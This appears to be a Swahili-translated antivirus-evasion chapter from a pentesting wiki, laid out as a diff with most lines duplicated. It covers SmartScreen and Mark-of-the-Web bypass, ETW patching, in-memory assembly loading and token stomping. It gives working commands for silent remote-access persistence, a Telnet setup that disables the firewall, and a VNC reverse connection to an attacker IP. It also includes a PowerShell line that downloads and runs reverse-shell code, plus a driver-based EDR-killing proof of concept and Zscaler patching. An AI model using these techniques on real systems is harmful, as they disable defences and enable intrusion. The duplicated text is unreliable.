- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator inaonyesha jinsi ya kutumia lugha ya `C++11/14` kuzalisha, wakati wa compilation, obfuscated code bila kutumia zana za nje na bila kubadilisha compiler.
- [**obfy**](https://github.com/fritzone/obfy): Inauongeza safu ya obfuscated operations zinazozalishwa na C++ template metaprogramming framework ambayo itafanya maisha ya mtu anayetaka crack application kuwa magumu kidogo.
- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz ni x64 binary obfuscator inayoweza obfuscate aina mbalimbali za pe files ikijumuisha: .exe, .dll, .sys
- [**metame**](https://github.com/a0rtega/metame): Metame ni metamorphic code engine rahisi kwa executables yoyote.
- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator ni fine-grained code obfuscation framework kwa LLVM-supported languages ikitumia ROP (return-oriented programming). ROPfuscator inafanya obfuscation ya programu kwenye assembly code level kwa kubadilisha maelekezo ya kawaida kuwa ROP chains, ikizuia mtazamo wetu wa kawaida wa control flow.
- [**Nimcrypt**](https://github.com/icyguider/nimcrypt): Nimcrypt ni .NET PE Crypter imeandikwa kwa Nim
- [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor inaweza kubadilisha EXE/DLL zilizopo kuwa shellcode kisha kuzipakia
- [**inceptor**](https://github.com/klezVirus/inceptor)**:** Inceptor ina uwezo wa kubadilisha EXE/DLL zilizopo kuwa shellcode kisha kuzileta ndani
## SmartScreen & MoTW
Huenda umewahi kuona skrini hii unapopakua baadhi ya executables kutoka mtandao na kuzitekeleza.
Huenda umewahi kuona screen hii unapopakua baadhi ya executables kutoka intaneti na kuziendesha.
Microsoft Defender SmartScreen ni utaratibu wa usalama uliokusudiwa kumlinda mtumiaji wa mwisho dhidi ya kuendesha applications ambazo zinaweza kuwa hatarishi.
Microsoft Defender SmartScreen ni mfumo wa usalama uliokusudiwa kulinda mtumiaji wa mwisho dhidi ya kuendesha applications zinazoweza kuwa malicious.
<figure><img src="../images/image (664).png" alt=""><figcaption></figcaption></figure>
SmartScreen huvumilia hasa kwa njia ya msingi wa sifa (reputation-based), ikimaanisha kwamba applications ambazo hazipakwi mara kwa mara zitatikisa SmartScreen, hivyo kuwatangazia na kuzuia mtumiaji kuendesha faili (hata hivyo faili bado inaweza kuendeshwa kwa kubofya More Info -> Run anyway).
SmartScreen hasa inafanya kazi kwa njia ya kutegemea sifa (reputation-based), ikimaanisha kwamba programu ambazo hazipakuliwi mara kwa mara zitasababisha SmartScreen kutoa onyo na kuzuia mtumiaji ku-execute faili (hata hivyo faili inaweza kuendeshwa kwa kubofya More Info -> Run anyway).
**MoTW** (Mark of The Web) ni [NTFS Alternate Data Stream](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>) yenye jina Zone.Identifier ambayo huundwa moja kwa moja unapo pakua faili kutoka mtandao, pamoja na URL iliyotumika kupakua.
**MoTW** (Mark of The Web) ni [NTFS Alternate Data Stream](<https://en.wikipedia.org/wiki/NTFS#Alternate_data_stream_(ADS)>) yenye jina Zone.Identifier ambayo huundwa moja kwa moja pale unapopakua faili kutoka intaneti, pamoja na URL ilipotolewa.
<figure><img src="../images/image (237).png" alt=""><figcaption><p>Kukagua Zone.Identifier ADS kwa faili iliyopakuliwa kutoka mtandao.</p></figcaption></figure>
<figure><img src="../images/image (237).png" alt=""><figcaption><p>Kukagua Zone.Identifier ADS kwa faili iliyopakuliwa kutoka intaneti.</p></figcaption></figure>
> [!TIP]
> Ni muhimu kutambua kwamba executables zilizotiwa saini na **trusted** signing certificate **hazitatikisi SmartScreen**.
> Ni muhimu kutambua kwamba executables zilizosainiwa na cheti cha kusaini **imeaminika** hazitachochea SmartScreen.
Njia yenye ufanisi mkubwa kuzuia payloads zako kupata Mark of The Web ni kuziweka ndani ya container kama ISO. Hii inatokea kwa sababu Mark-of-the-Web (MOTW) **haiwezi** kutumika kwenye volumes zisizo za NTFS.
Njia yenye ufanisi kuzuia payloads zako kupata Mark of The Web ni kuwapakisha ndani ya container kama ISO. Hii inatokea kwa sababu Mark-of-the-Web (MOTW) **haiwezi** kutumika kwenye volumes **non NTFS**.
<figure><img src="../images/image (640).png" alt=""><figcaption></figcaption></figure>
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) ni chombo kinachofunga payloads ndani ya output containers ili kuepuka Mark-of-the-Web.
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) ni zana inayoweka payloads ndani ya output containers ili kuepuka Mark-of-the-Web.
Example usage:
```bash
@ -381,57 +416,57 @@ Adding file: /TotallyLegitApp.exe
[+] Generated file written to (size: 3420160): container.iso
```
Hapa kuna demo ya kuvuka SmartScreen kwa kufunga payloads ndani ya faili za ISO kwa kutumia [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using [PackMyPayload](https://github.com/mgeeky/PackMyPayload/)
<figure><img src="../images/packmypayload_demo.gif" alt=""><figcaption></figcaption></figure>
## ETW
Event Tracing for Windows (ETW) ni mekanisma yenye nguvu ya logging katika Windows inayoruhusu programu na vipengele vya mfumo **kuandika matukio**. Hata hivyo, pia inaweza kutumika na bidhaa za usalama kufuatilia na kugundua shughuli hatarishi.
Event Tracing for Windows (ETW) ni mfumo wenye nguvu wa logging katika Windows unaoruhusu programu na vipengele vya mfumo **kurekodi matukio**. Hata hivyo, pia unaweza kutumiwa na bidhaa za usalama kufuatilia na kugundua shughuli zenye madhara.
Vivyo hivyo jinsi AMSI inavyokatizwa (kuepukwa), pia inawezekana kufanya funksioni ya user space `EtwEventWrite` irudie mara moja bila kuandika matukio yoyote. Hii hufanywa kwa kupachika (patch) funksioni hiyo katika memory ili irudie mara moja, kwa ufanisi kuzima logging ya ETW kwa mchakato huo.
Kwa namna ile ile AMSI inavyozimwa (kuvukwa) pia inawezekana kufanya function ya **`EtwEventWrite`** ya user space process irudie mara moja bila kurekodi matukio yoyote. Hii hufanywa kwa kupatch function hiyo katika memory ili irudie mara moja, kwa ufanisi kuzima ETW logging kwa process hiyo.
Unaweza kupata maelezo zaidi katika **[https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/) and [https://github.com/repnz/etw-providers-docs/](https://github.com/repnz/etw-providers-docs/)**.
You can find more info in **[https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/) and [https://github.com/repnz/etw-providers-docs/](https://github.com/repnz/etw-providers-docs/)**.
## C# Assembly Reflection
Kupakia binaries za C# ndani ya memory imekuwa ikitumiwa kwa muda na bado ni njia nzuri ya kuendesha post-exploitation tools bila kugunduliwa na AV.
Kupakia C# binaries katika memory kumejulikana kwa muda mrefu na bado ni njia nzuri ya kuendesha zana zako za post-exploitation bila kukamatwa na AV.
Kwa kuwa payload itapakiwa moja kwa moja kwenye memory bila kugusa disk, tutalazimika tu kuzingatia kupatch AMSI kwa mchakato mzima.
Kwa kuwa payload itapakiwa moja kwa moja kwenye memory bila kugusa disk, tutalazimika kuzingatia tu kupatch AMSI kwa process nzima.
Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) tayari zina uwezo wa kutekeleza C# assemblies moja kwa moja kwenye memory, lakini kuna njia tofauti za kufanya hivyo:
Wengi wa C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) tayari wanatoa uwezo wa kutekeleza C# assemblies moja kwa moja katika memory, lakini kuna njia tofauti za kufanya hivyo:
- **Fork\&Run**
Inahusisha **kuanzisha mchakato mpya wa kujitoa (sacrificial process)**, kuingiza post-exploitation malicious code yako ndani ya mchakato huo mpya, kutekeleza code yako ya uharibifu na baada ya kumaliza, kuua mchakato huo mpya. Hii ina faida na hasara zake. Faida ya njia ya fork and run ni kwamba utekelezaji unafanyika **nje** ya mchakato wetu wa Beacon implant. Hii inamaanisha kwamba ikiwa kitu katika hatua yetu ya post-exploitation kitaenda vibaya au kitakamatwa, kuna **uwezekano mkubwa zaidi** wa **implant kuishi.** Hasara ni kwamba una **uwezekano mkubwa zaidi** wa kugunduliwa na **Behavioural Detections**.
Inahusisha **kuanzisha process mpya ya sadaka (sacrificial process)**, kuingiza post-exploitation malicious code yako ndani ya process hiyo mpya, kutekeleza malicious code yako na baada ya kukamilika, kuua process mpya. Hii ina faida na hasara zake. Faida ya njia ya fork and run ni kwamba utekelezaji hufanyika **nje** ya Beacon implant process yetu. Hii inamaanisha kwamba ikiwa jambo fulani katika hatua yetu ya post-exploitation litashindikana au litagunduliwa, kuna **uwezekano mkubwa zaidi** wa **implant yetu kuishi.** Hasara ni kwamba una **uwezekano mkubwa** wa kugunduliwa na **Behavioural Detections**.
<figure><img src="../images/image (215).png" alt=""><figcaption></figcaption></figure>
- **Inline**
Inahusu kuingiza post-exploitation malicious code **katika mchakato wake mwenyewe**. Kwa njia hii, unaweza kuepuka kuunda mchakato mpya na kukipimwa na AV, lakini hasara ni kwamba ikiwa kitu kitaenda vibaya kwa utekelezaji wa payload yako, kuna **uwezekano mkubwa zaidi** wa **kupoteza beacon** kwani inaweza kushindwa (crash).
Inahusu kuingiza post-exploitation malicious code **ndani ya process yake mwenyewe**. Kwa njia hii, unaweza kuepuka kuunda process mpya na kuipata ikiskaniwa na AV, lakini hasara ni kwamba ikiwa kitu kitakachosababisha hitilafu wakati wa utekelezaji wa payload yako, kuna **uwezekano mkubwa zaidi** wa **kupoteza beacon yako** kwani inaweza kuanguka.
<figure><img src="../images/image (1136).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Ikiwa ungependa kusoma zaidi kuhusu kupakia C# Assembly, tafadhali angalia makala hii [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) na BOF yao InlineExecute-Assembly ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
> Ikiwa unataka kusoma zaidi kuhusu kupakia C# Assembly, tafadhali angalia makala hii [https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/](https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/) na InlineExecute-Assembly BOF ([https://github.com/xforcered/InlineExecute-Assembly](https://github.com/xforcered/InlineExecute-Assembly))
Unaweza pia kupakia C# Assemblies **kutoka PowerShell**, angalia [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) na [S3cur3th1sSh1t's video](https://www.youtube.com/watch?v=oe11Q-3Akuk).
Unaweza pia kupakia C# Assemblies **from PowerShell**, angalia [Invoke-SharpLoader](https://github.com/S3cur3Th1sSh1t/Invoke-SharpLoader) na video ya S3cur3th1sSh1t ([https://www.youtube.com/watch?v=oe11Q-3Akuk](https://www.youtube.com/watch?v=oe11Q-3Akuk)).
## Using Other Programming Languages
Kama ilivyopendekezwa katika [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), inawezekana kutekeleza malicious code kwa kutumia lugha nyingine kwa kumruhusu mashine iliyoharibika kupata mazingira ya interpreter iliyowekwa kwenye Attacker Controlled SMB share.
Kama ilivyopendekezwa katika [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins), inawezekana kutekeleza malicious code kwa kutumia lugha nyingine kwa kumpa mashine iliyokumbwa ufikiaji **to the interpreter environment installed on the Attacker Controlled SMB share**.
Kwa kuruhusu ufikiaji wa Interpreter Binaries na mazingira kwenye SMB share unaweza **execute arbitrary code in these languages within memory** ya mashine iliyoharibika.
Kwa kuruhusu ufikiaji wa Interpreter Binaries na mazingira kwenye SMB share unaweza **execute arbitrary code in these languages within memory** ya mashine iliyokumbwa.
Repo inaonyesha: Defender bado inapima scripts lakini kwa kutumia Go, Java, PHP n.k. tunapata **more flexibility to bypass static signatures**. Ujaribu na random un-obfuscated reverse shell scripts katika lugha hizi umeonyesha mafanikio.
The repo indicates: Defender bado inaskana scripts lakini kwa kutumia Go, Java, PHP n.k. tuna **more flexibility to bypass static signatures**. Testing na random un-obfuscated reverse shell scripts katika lugha hizi imeonyesha mafanikio.
## TokenStomping
Token stomping ni mbinu inayoruhusu mshambuliaji **kuingilia access token au bidhaa ya usalama kama EDR au AV**, ikimruhusu kupunguza ruhusa zake ili mchakato usife lakini usiwe na ruhusa za kukagua shughuli hatarishi.
Token stomping ni teknik inayomruhusu mshambuliaji **manipulate the access token or a security prouct like an EDR or AV**, kuwaondoa privileges ili process haijaangamizwa lakini haitakuwa na ruhusa za kuchunguza shughuli zenye hatari.
Ili kuzuia hili Windows inaweza **kuzuia michakato ya nje** kupata handles juu ya tokeni za michakato ya usalama.
Ili kuzuia hili Windows inaweza **prevent external processes** kutoka kupata handles juu ya tokens za security processes.
- [**https://github.com/pwn1sher/KillDefender/**](https://github.com/pwn1sher/KillDefender/)
- [**https://github.com/MartinIngesen/TokenStomp**](https://github.com/MartinIngesen/TokenStomp)
@ -441,76 +476,76 @@ Ili kuzuia hili Windows inaweza **kuzuia michakato ya nje** kupata handles juu y
### Chrome Remote Desktop
Kama ilivyoelezwa katika [**this blog post**](https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide), ni rahisi tu kusanisha Chrome Remote Desktop kwenye PC ya mwathirika na kisha kuitumia kumimiliki na kudumisha persistence:
1. Download kutoka https://remotedesktop.google.com/, bonyeza "Set up via SSH", kisha bonyeza faili la MSI kwa Windows ili kupakua faili ya MSI.
2. Endesha installer kwa kimya kwenye mashine ya mwathirika (inahitaji admin): `msiexec /i chromeremotedesktophost.msi /qn`
3. Rudi kwenye ukurasa wa Chrome Remote Desktop na bonyeza next. Wizard itakuuliza uidhinishe; bonyeza kitufe cha Authorize ili kuendelea.
4. Endesha parameter iliyotolewa kwa marekebisho machache: `"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111` (Kumbuka param ya pin inayoruhusu kuweka pin bila kutumia GUI).
Kama ilivyoelezwa katika [**this blog post**](https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide), ni rahisi tu kusakinisha Chrome Remote Desktop kwenye PC ya mwathirika kisha kuutumia kuuuwa na kudumisha persistence:
1. Download from https://remotedesktop.google.com/, click on "Set up via SSH", and then click on the MSI file for Windows to download the MSI file.
2. Run the installer silently in the victim (admin required): `msiexec /i chromeremotedesktophost.msi /qn`
3. Go back to the Chrome Remote Desktop page and click next. The wizard will then ask you to authorize; click the Authorize button to continue.
4. Execute the given parameter with some adjustments: `"%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="YOUR_UNIQUE_CODE" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=111111` (Kumbuka param ya pin inayoruhusu kuweka pin bila kutumia GUI).
## Advanced Evasion
Evasion ni mada ngumu sana, wakati mwingine unalazimika kuzingatia vyanzo vingi vya telemetry ndani ya mfumo mmoja, hivyo ni vigumu kabisa kubaki bila kugunduliwa katika mazingira yaliyojaa teknolojia.
Evasion ni mada yenye ugumu mkubwa, wakati mwingine lazima uzingatie vyanzo vingi tofauti vya telemetry katika mfumo mmoja, hivyo ni karibu haiwezekani kubaki bila kugunduliwa kabisa katika mazingira yaliyoendelea.
Kila mazingira unayokabiliana nayo itakuwa na nguvu na udhaifu wake.
Kila mazingira utakayoshambulia yatakuwa na nguvu na udhaifu wake.
Ninakupongeza uangalie hotuba hii kutoka kwa [@ATTL4S](https://twitter.com/DaniLJ94), ili kupata mtazamo wa mbinu za Advanced Evasion.
Ninakuhimiza sana uangalie mazungumzo haya kutoka kwa [@ATTL4S](https://twitter.com/DaniLJ94), ili kupata msingi wa mbinu zaidi za Advanced Evasion techniques.
{{#ref}}
https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo
{{#endref}}
Hii pia ni hotuba nzuri kutoka kwa [@mariuszbit](https://twitter.com/mariuszbit) kuhusu Evasion in Depth.
Hii pia ni mazungumzo mazuri kutoka kwa [@mariuszbit](https://twitter.com/mariuszbit) kuhusu Evasion in Depth.
{{#ref}}
https://www.youtube.com/watch?v=IbA7Ung39o4
{{#endref}}
## **Mbinu za Kale**
## **Old Techniques**
### **Angalia ni sehemu gani Defender inaona kuwa hatarishi**
### **Check which parts Defender finds as malicious**
Unaweza kutumia [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) ambayo itatoa sehemu za binary mpaka itagundua ni sehemu gani Defender inaiona kuwa hatarishi na itakuonyesha.\
Chombo kingine kinachofanya jambo **sawa** ni [**avred**](https://github.com/dobin/avred) na huduma ya wavuti inapatikana kwenye [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
Unaweza kutumia [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck) ambayo ita **ondoa sehemu za binary** hadi itakapogundua ni **sehemu gani Defender** inaiona kama malicious na kukugawa.\
Chombo kingine kinachofanya **kitu sawa ni** [**avred**](https://github.com/dobin/avred) ambayo inatoa huduma hiyo kupitia tovuti ya wazi [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)
### **Telnet Server**
Hadi Windows10, Windows zote ziliokuja na **Telnet server** ambayo unaweza kusanisha (kama administrator) ukifanya:
Hadi Windows10, Windows zote zilikuja na **Telnet server** ambayo unaweza kuisakinisha (kama administrator) ukifanya:
```bash
pkgmgr /iu:"TelnetServer" /quiet
```
Fanya **ianze** wakati mfumo unapoanza na **endesha** sasa:
Ifanye **ianze** wakati mfumo unapoanza na **endeshe** sasa:
```bash
sc config TlntSVR start= auto obj= localsystem
```
**Badilisha telnet port** (stealth) na zima firewall:
**Badilisha telnet port** (stealth) na uzime firewall:
```
tlntadmn config port=80
netsh advfirewall set allprofiles state off
```
### UltraVNC
Pakua kutoka: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (unataka downloads za bin, si setup)
Pakua kutoka: [http://www.uvnc.com/downloads/ultravnc.html](http://www.uvnc.com/downloads/ultravnc.html) (unataka bin downloads, si setup)
**KWENYE HOST**: Endesha _**winvnc.exe**_ na sanidi server:
**KWENYE HOST**: Endesha _**winvnc.exe**_ na usanidi seva:
- Washa chaguo _Disable TrayIcon_
- Weka nywila katika _VNC Password_
- Weka nywila katika _View-Only Password_
- Weka nenosiri katika _VNC Password_
- Weka nenosiri katika _View-Only Password_
Kisha, hamisha binary _**winvnc.exe**_ na faili **mpya** iliyoundwa _**UltraVNC.ini**_ ndani ya **victim**
Kisha, hamisha binary _**winvnc.exe**_ na faili **mpya** iliyotengenezwa _**UltraVNC.ini**_ ndani ya **victim**
#### **Reverse connection**
**attacker** anapaswa kukimbisha kwenye **host** yake binary `vncviewer.exe -listen 5900` ili iwe tayari kushika reverse **VNC connection**. Kisha, ndani ya **victim**: Anzisha daemon ya winvnc `winvnc.exe -run` na endesha `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**attacker** anapaswa **endesha ndani ya** **host** binary `vncviewer.exe -listen 5900` ili iwe **tayari** kunasa reverse **VNC connection**. Kisha, ndani ya **victim**: Anza daemon ya winvnc `winvnc.exe -run` na endesha `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`
**ONYO:** Ili kubaki bila kuonekana usifanye mambo kadhaa
**ONYO:** Ili kudumisha usiri usifanye mambo yafuatayo
- Usianze `winvnc` ikiwa tayari inaendesha au utaanzisha [popup](https://i.imgur.com/1SROTTl.png). Angalia ikiwa inaendesha kwa `tasklist | findstr winvnc`
- Usianze `winvnc` bila `UltraVNC.ini` kuwa katika saraka hiyo hiyo au itasababisha [dirisha la config](https://i.imgur.com/rfMQWcf.png) kufunguka
- Usiruhusu `winvnc -h` kwa msaada au utaanzisha [popup](https://i.imgur.com/oc18wcu.png)
- Usianze `winvnc` ikiwa tayari inaendesha au utaamsha [popup](https://i.imgur.com/1SROTTl.png). Angalia kama inaendesha kwa `tasklist | findstr winvnc`
- Usianze `winvnc` bila `UltraVNC.ini` katika sarasili hiyo hiyo au itasababisha [the config window](https://i.imgur.com/rfMQWcf.png) kufunguka
- Usifanye `winvnc -h` kwa msaada au utaamsha [popup](https://i.imgur.com/oc18wcu.png)
### GreatSCT
@ -532,19 +567,19 @@ sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
```
Sasa **anza lister** kwa kutumia `msfconsole -r file.rc` na **endesha** **xml payload** kwa kutumia:
Sasa **anzisha lister** kwa kutumia `msfconsole -r file.rc` na **utekeleze** **xml payload** kwa:
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
```
**Defender wa sasa atasitisha mchakato haraka sana.**
**Defender wa sasa ataisha mchakato haraka sana.**
### Kujenga reverse shell yetu
### Ku-compile reverse shell yetu
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
#### C# Revershell ya Kwanza
#### C# reverse shell ya kwanza
Jenga kwa:
Ita-compile kwa:
```
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
```
@ -625,7 +660,7 @@ catch (Exception err) { }
}
}
```
### Kutumia compiler katika C#
### C# kwa kutumia kompaila
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
@ -633,7 +668,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe RE
[REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639](https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639)
Kupakua na kutekeleza moja kwa moja:
Kupakua na kutekeleza kwa otomatiki:
```csharp
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
@ -660,7 +695,7 @@ i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sec
- [http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html](http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html)
- [http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/](http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
### Kutumia python kwa mfano wa build injectors:
### Mfano wa kutumia python kujenga injectors:
- [https://github.com/cocomelonc/peekaboo](https://github.com/cocomelonc/peekaboo)
@ -689,27 +724,27 @@ https://github.com/TheWover/donut
# Vulcan
https://github.com/praetorian-code/vulcan
```
### More
### Zaidi
- [https://github.com/Seabreg/Xeexe-TopAntivirusEvasion](https://github.com/Seabreg/Xeexe-TopAntivirusEvasion)
## Bring Your Own Vulnerable Driver (BYOVD) Kuua AV/EDR kutoka Kernel Space
Storm-2603 ilitumia kifupi cha console kinachojulikana kama **Antivirus Terminator** kuzima ulinzi wa endpoint kabla ya kuangusha ransomware. Zana hiyo inaleta **driver yake mwenye udhaifu lakini *imesainiwa*** na kuutumia kutekeleza operesheni za kernel zenye vipaumbele ambazo hata huduma za AV za Protected-Process-Light (PPL) haziwezi kuzizuia.
Storm-2603 ilitumia utiliti ndogo ya console inayojulikana kama **Antivirus Terminator** kuzima ulinzi wa endpoint kabla ya kupeleka ransomware. Zana hiyo inaleta **own vulnerable but *signed* driver** na kuitumia kutoa shughuli za kernel zenye vigezo vya juu ambazo hata huduma za AV za Protected-Process-Light (PPL) haziwezi kuzuia.
Mambo muhimu
1. **Signed driver**: Faili lililowekwa kwenye diski ni `ServiceMouse.sys`, lakini binary ni driver iliyo saini kwa uhalali `AToolsKrnl64.sys` kutoka Antiy Labs “System In-Depth Analysis Toolkit”. Kwa sababu driver ina saini halali ya Microsoft, inaloweshwa hata wakati Driver-Signature-Enforcement (DSE) imewezeshwa.
2. **Service installation**:
Vidokezo muhimu
1. **Signed driver**: Faili iliyowekwa kwenye disk ni `ServiceMouse.sys`, lakini binary ni driver halali iliyo na saini `AToolsKrnl64.sys` kutoka Antiy Labs “System In-Depth Analysis Toolkit”. Kwa sababu driver ina saini halali ya Microsoft, inaload hata wakati Driver-Signature-Enforcement (DSE) imewezeshwa.
2. Ufungaji wa service:
```powershell
sc create ServiceMouse type= kernel binPath= "C:\Windows\System32\drivers\ServiceMouse.sys"
sc start ServiceMouse
```
Mstari wa kwanza unasajili driver kama **kernel service** na wa pili unaiendesha ili `\\.\ServiceMouse` iweze kupatikana kutoka user land.
3. **IOCTLs exposed by the driver**
Mstari wa kwanza unasajili driver kama **kernel service** na wa pili unaanza ili `\\.\ServiceMouse` iweze kupatikana kutoka user land.
3. IOCTLs zinazofichuliwa na driver
| IOCTL code | Uwezo |
|-----------:|------------------------------------|
| `0x99000050` | Terminate an arbitrary process by PID (inatumika kuua huduma za Defender/EDR) |
| `0x990000D0` | Delete an arbitrary file on disk |
|-----------:|-----------------------------------------|
| `0x99000050` | Kuua mchakato wowote kwa PID (kutumika kuua huduma za Defender/EDR) |
| `0x990000D0` | Futa faili yoyote kwenye disk |
| `0x990001D0` | Unload the driver and remove the service |
Minimal C proof-of-concept:
@ -724,28 +759,28 @@ CloseHandle(hDrv);
return 0;
}
```
4. **Why it works**: BYOVD inakwepa kabisa ulinzi wa user-mode; code inayotekelezwa kwenye kernel inaweza kufungua michakato *ilizoangaziwa*, kuimaliza (terminate), au kughushi vitu vya kernel bila kujali PPL/PP, ELAM au vipengele vingine vya kuimarisha.
4. Kwa nini inafanya kazi: BYOVD inapuuza ulinzi wa user-mode kabisa; code inayotekelezwa kwenye kernel inaweza kufungua *protected* processes, kuziua, au kuingilia vitu vya kernel bila kujali PPL/PP, ELAM au vipengele vingine vya hardening.
Utambuzi / Kupunguza hatari
• Washa orodha ya kuzuia vulnerable-driver ya Microsoft (`HVCI`, `Smart App Control`) ili Windows ikatae kuingiza `AToolsKrnl64.sys`.
Subiri (monitor) uundaji wa services mpya za *kernel* na toa tahadhari wakati driver inapopewa load kutoka saraka inayoweza kuandikwa na kila mtu au ikiwa haiko kwenye allow-list.
• Angalia handles za user-mode kwa device objects maalum ikifuatiwa na simu za kushangaza za `DeviceIoControl`.
Uchunguzi / Uzuiaji
• Washa orodha ya kuzuia madereva yenye udhaifu ya Microsoft (`HVCI`, `Smart App Control`) ili Windows ikatae kupakia `AToolsKrnl64.sys`.
Fuatilia uundaji wa huduma mpya za *kernel* na toa tahadhari wakati driver inapopakuliwa kutoka directory inayoweza kuandikwa na wote au haipo kwenye allow-list.
• Angalia handles za user-mode kwa custom device objects zinazoambatana na simu za hatari za `DeviceIoControl`.
### Kuepuka Zscaler Client Connector Posture Checks kupitia On-Disk Binary Patching
### Kupitisha Zscaler Client Connector Posture Checks kupitia On-Disk Binary Patching
Zscalers **Client Connector** inatekeleza sheria za device-posture kwa mteja moja kwa moja na inategemea Windows RPC kuwasilisha matokeo kwa vipengele vingine. Chaguzi mbili za kubuni zenye udhaifu zinafanya uepukaji kamili uwezekane:
Zscalers **Client Connector** inatekeleza sheria za device-posture kwa upande wa mteja na inategemea Windows RPC kuwasilisha matokeo kwa vipengele vingine. Machaguo mawili ya kubuni yaliyo dhaifu yanafanya bypass kamili iwezekane:
1. Tathmini ya posture hufanyika **kikamilifu client-side** (boolean hutumwa kwa server).
2. Endpoints za ndani za RPC zinathibitisha tu kwamba executable inayounganisha imesainiwa na Zscaler (kwa kutumia `WinVerifyTrust`).
1. Tathmini ya posture hufanywa **entirely client-side** (boolean hutumwa kwa server).
2. Internal RPC endpoints zinathibitisha tu kwamba executable inayounganisha ime **signed by Zscaler** (kwa `WinVerifyTrust`).
Kwa **kupachika binaries zenye saini nne kwenye diski** mbinu zote mbili zinaweza kutolewa/kuzimwa:
Kwa **kufanya patching kwa binaries nne zilizotiwa saini kwenye disk** mbinu zote mbili zinaweza kuzimwa:
| Binary | Original logic patched | Result |
|--------|------------------------|---------|
| `ZSATrayManager.exe` | `devicePostureCheck() → return 0/1` | Inarudisha `1` kila wakati hivyo kila ukaguzi unakubalika |
| `ZSAService.exe` | Indirect call to `WinVerifyTrust` | NOP-ed ⇒ process yoyote (hata isiyosainiwa) inaweza ku-bind kwenye RPC pipes |
| `ZSATrayHelper.dll` | `verifyZSAServiceFileSignature()` | Imereplaced na `mov eax,1 ; ret` |
| `ZSATunnel.exe` | Integrity checks on the tunnel | Zimekataliwa / short-circuited |
| Binary | Mantiki ya asili iliyopatchiwa | Matokeo |
|--------|-------------------------------|---------|
| `ZSATrayManager.exe` | `devicePostureCheck() → return 0/1` | Inarudisha kila wakati `1` hivyo kila ukaguzi unaonekana kuwa compliant |
| `ZSAService.exe` | Indirect call to `WinVerifyTrust` | NOP-ed ⇒ any (even unsigned) process can bind to the RPC pipes |
| `ZSATrayHelper.dll` | `verifyZSAServiceFileSignature()` | Replaced by `mov eax,1 ; ret` |
| `ZSATunnel.exe` | Integrity checks on the tunnel | Imekatizwa |
